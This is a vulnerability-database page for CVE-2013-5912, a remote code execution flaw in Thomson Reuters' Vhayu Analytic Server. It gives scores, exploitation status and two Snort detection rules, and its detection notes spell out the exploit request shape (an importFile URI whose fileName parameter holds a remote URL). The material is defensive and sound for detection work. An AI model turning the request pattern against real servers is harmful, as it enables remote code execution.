cbcvebase.
CVE-2013-5912
published 2013-11-28

CVE-2013-5912: VhttpdMgr in Thomson Reuters Velocity Analytics Vhayu Analytic Server 6.94 build 2995 allows remote attackers to execute arbitrary code via a URL in the…

PriorityP278critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
31.43%
98.1th percentile
VhttpdMgr in Thomson Reuters Velocity Analytics Vhayu Analytic Server 6.94 build 2995 allows remote attackers to execute arbitrary code via a URL in the fileName parameter during an importFile action.

Affected

1 ranges
VendorProductVersion rangeFixed in
thomsonreutersvelocity_analytics_vhayu_analytic_server

Detection & IOCsextracted from sources · hover to see the quote

url/VhttpdMgr?action=importFile&fileName=
path/VhttpdMgr
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Thomson Reuters Velocity Analytics Vhayu Analytic Servers 6.94 build 2995 CVE-2013-5912 (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/VhttpdMgr?action=importFile&fileName="; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2013-5192; classtype:attempted-admin; sid:2029166; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2013_5192, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
snort
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Thomson Reuters Velocity Analytics Vhayu Analytic Servers 6.94 build 2995 CVE-2013-5912 (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/VhttpdMgr?action=importFile&fileName="; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2013-5192; classtype:attempted-admin; sid:2029167; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2013_5192, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
  • Exploit is triggered via an HTTP GET request to /VhttpdMgr with action=importFile and a remote URL supplied in the fileName parameter; look for HTTP GET requests where the URI starts with /VhttpdMgr?action=importFile&fileName= followed by an http:// or https:// URL.
  • The vulnerability is exploited by remote attackers supplying a URL in the fileName parameter during an importFile action, enabling remote code execution; monitor for outbound connections from the server immediately following such requests (server fetching attacker-controlled payload).
  • Exploitation grants SYSTEM-level privileges; any process spawned by the Vhayu Analytic Server (VhttpdMgr) following an importFile request should be treated as highly suspicious.
  • This vulnerability has been observed exploited in the wild by the Mirai variant EchoBot; correlate detections with known Mirai/EchoBot IoT botnet infrastructure.
  • ·The ET Snort rules (sid:2029166 and sid:2029167) reference CVE-2013-5192 in their metadata, which appears to be a typo/mislabeling — the correct CVE for this vulnerability is CVE-2013-5912. Ensure any rule tuning or suppression is applied to the correct CVE.
  • ·The Snort rules detect the URI prefix /VhttpdMgr?action=importFile&fileName= followed by content:"http" at distance:0, meaning only payloads where the fileName value begins with http (i.e., a remote URL) are matched; local file path payloads would not be caught by these rules.

CVSS provenance

nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.